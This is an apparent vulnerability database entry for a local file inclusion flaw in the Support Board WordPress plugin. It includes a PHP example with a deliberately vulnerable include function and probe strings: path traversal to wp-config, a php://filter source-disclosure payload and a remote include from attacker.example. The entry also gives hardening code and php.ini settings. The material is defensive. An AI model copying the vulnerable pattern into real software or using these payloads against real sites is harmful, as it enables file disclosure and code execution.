CVE-2025-54031
Severity: High

Published: 20 August 2025
Modified: 23 April 2026
KEV Added: not listed
CVSS v3.1: 8.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS: 0.0016 (36.4th percentile)
Risk Priority: 16 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2025-54031 is a high-severity file inclusion vulnerability classed under CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program, titled 'PHP Remote File Inclusion'); the reported impact is local file inclusion. Its CVSS v3.1 base score is 8.1 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). EPSS ranks it at the 36.4th percentile by exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2025-54031 is an Improper Control of Filename for Include/Require Statement in PHP Program weakness (CWE-98, whose CWE title is 'PHP Remote File Inclusion') in the Schiocco Support Board WordPress plugin; the impact reported for this CVE is PHP Local File Inclusion. All Support Board versions up to and including 3.8.0 are affected (no lower bound is given). The CVSS v3.1 base score is 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).

Remote, unauthenticated attackers can exploit this vulnerability over the network: the vector records no privileges and no user interaction, but high attack complexity (AC:H), so a working exploit depends on conditions outside the attacker's direct control. Successful exploitation has high impact on confidentiality, integrity and availability. At minimum the attacker can read local files readable by the web-server user (PHP source is typically disclosed through the php://filter wrapper rather than by direct inclusion, since a directly included .php file is executed instead of returned). If the attacker can get content they control into an includable file (an uploaded attachment, a poisoned log, or a remote URL when allow_url_include is enabled), the inclusion becomes arbitrary PHP code execution.
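
The include pattern behind CWE-98 and a hardened replacement, as an added example. This is not the Support Board plugin's code and says nothing about where that plugin's flaw actually sits; the function names, the template names and the `$baseDir` layout are assumptions for illustration. The CLI section builds a throwaway template directory and runs constructed probe inputs against the hardened resolver.

```php
<?php
declare(strict_types=1);

/*
 * Added example, not code from the Support Board plugin or from Patchstack.
 * render_template_vulnerable(), resolve_template(), render_template(), the
 * template names and $baseDir are hypothetical.
 */

// VULNERABLE (CWE-98): the caller's string selects the file.
//   "../../wp-config"  -> the include leaves the template directory and
//                         executes whatever PHP file it lands on.
//   "php://filter/convert.base64-encode/resource=../../wp-config"
//                      -> the appended ".php" still lands on wp-config.php,
//                         and the filter returns its source instead of
//                         executing it (source disclosure).
//   "http://attacker.example/shell" (allow_url_include=On)
//                      -> remote PHP is fetched and executed.
function render_template_vulnerable(string $tpl, string $baseDir): void
{
    include $baseDir . '/' . $tpl . '.php';
}

// HARDENED: allowlist first, then confine the resolved path to $baseDir.
function resolve_template(string $tpl, string $baseDir): ?string
{
    // 1. Allowlist: the only values the application ever intends to include.
    //    Stream wrappers, traversal and remote URLs never match.
    static $allowed = ['ticket', 'chat', 'settings'];
    if (!in_array($tpl, $allowed, true)) {
        return null;
    }

    // 2. Path confinement as defence in depth (survives a later change that
    //    loosens the allowlist): resolve symlinks and "..", then require the
    //    result to sit below the template directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $tpl . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_template(string $tpl, string $baseDir): void
{
    $path = resolve_template($tpl, $baseDir);
    if ($path === null) {
        http_response_code(400);
        echo 'invalid template';
        return;
    }
    include $path;
}

if (PHP_SAPI === 'cli') {
    // Constructed fixture: a temporary template directory with one template.
    $dir = sys_get_temp_dir() . '/tpl_' . bin2hex(random_bytes(4));
    mkdir($dir, 0700);
    file_put_contents($dir . '/ticket.php', "<?php echo 'ticket view';\n");

    // Constructed probe inputs: one legitimate value and three attack strings.
    $probes = [
        'ticket',
        '../../wp-config',
        'php://filter/convert.base64-encode/resource=../../wp-config',
        'http://attacker.example/shell',
    ];
    foreach ($probes as $p) {
        $r = resolve_template($p, $dir);
        printf("%-62s -> %s\n", $p, $r === null ? 'rejected' : 'ok: ' . basename($r));
    }

    unlink($dir . '/ticket.php');
    rmdir($dir);
}
```

Run with `php example.php`: only `ticket` resolves; the three probes are rejected by the allowlist before any filesystem access. The realpath check is deliberately redundant with the allowlist, so that a future maintainer who replaces the allowlist with a regex still cannot escape the template directory.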

Patchstack documents this vulnerability, including mitigation guidance, in its database entry at https://patchstack.com/database/Wordpress/Plugin/supportboard/vulnerability/wordpress-support-board-3-8-0-local-file-inclusion-vulnerability?_s_id=cve. The vulnerability was published on 2025-08-20T08:15:46.730.

Vulnerability details

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Schiocco Support Board (plugin slug: supportboard) allows PHP Local File Inclusion. This issue affects Support Board: from n/a through <= 3.8.0.

CWE(s)

CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-generated mapping)

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1505.003 Web Shell (Persistence)
Adversaries may backdoor web servers with web shells to establish persistent access to systems.
Why these techniques?

An LFI/RFI flaw in an Internet-facing WordPress plugin is exploited directly over HTTP, which is T1190. If the attacker can place PHP they control on disk (an uploaded attachment, a poisoned log) or, with allow_url_include enabled, on a remote host, including that file executes it; that is how the inclusion becomes a persistent web shell (T1505.003).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2024-13408 (shared CWE-98)
CVE-2026-39387 (shared CWE-98)
CVE-2026-3425 (shared CWE-98)
CVE-2026-27383 (shared CWE-98)
CVE-2024-51319 (shared CWE-98)
CVE-2025-30845 (shared CWE-98)
CVE-2025-26985 (shared CWE-98)
CVE-2025-52732 (shared CWE-98)
CVE-2025-69078 (shared CWE-98)
CVE-2026-24538 (shared CWE-98)

Mitigating Controls

Mitigating Controls (NIST 800-53 r5, AI-generated mapping)

SI-2 Flaw Remediation (prevent)

Directly mitigates the CVE: update the Schiocco Support Board WordPress plugin from any version <= 3.8.0 to a fixed release, which removes the improper filename control in the PHP include/require statement.

SI-10 Information Input Validation (prevent)

Validates user-supplied filenames before they reach include/require (an allowlist of expected values plus confinement of the resolved path to the intended directory), which prevents the local file inclusion described by CWE-98.

Secure configuration (prevent)

Establishes secure PHP configuration settings such as open_basedir restrictions and allow_url_include=Off, limiting what an include in a vulnerable plugin can reach. These settings reduce blast radius but do not block inclusion of files inside the permitted directories, so they complement patching rather than replace it.
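
The settings named above, shown as an added php.ini fragment with the weak values beside the hardened ones. This is not from the page, the plugin or Patchstack; the paths are assumptions for a typical Linux WordPress layout and must be adjusted to the real document root and temp directory.

```ini
; Added example php.ini fragment (not from the page or the plugin).
; Paths are assumptions for a typical Linux WordPress install.

; --- Weak: remote code can be pulled into include/require, and an include
; --- may reach any file the web-server user can read.
; allow_url_include = On
; allow_url_fopen   = On
; open_basedir      =

; --- Hardened:
allow_url_include = Off                 ; no http:// or ftp:// targets in include/require
allow_url_fopen   = Off                 ; also blocks remote targets for fopen/file_get_contents;
                                        ; re-enable only if a site feature needs it
open_basedir      = /var/www/html:/tmp  ; file access (including php://filter resources)
                                        ; cannot leave these trees
```

open_basedir also governs the resource path behind php://filter, so source disclosure outside the listed trees is blocked; anything inside them, wp-config.php included, remains reachable to a vulnerable include, which is why this is a containment measure and not a substitute for the plugin update.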
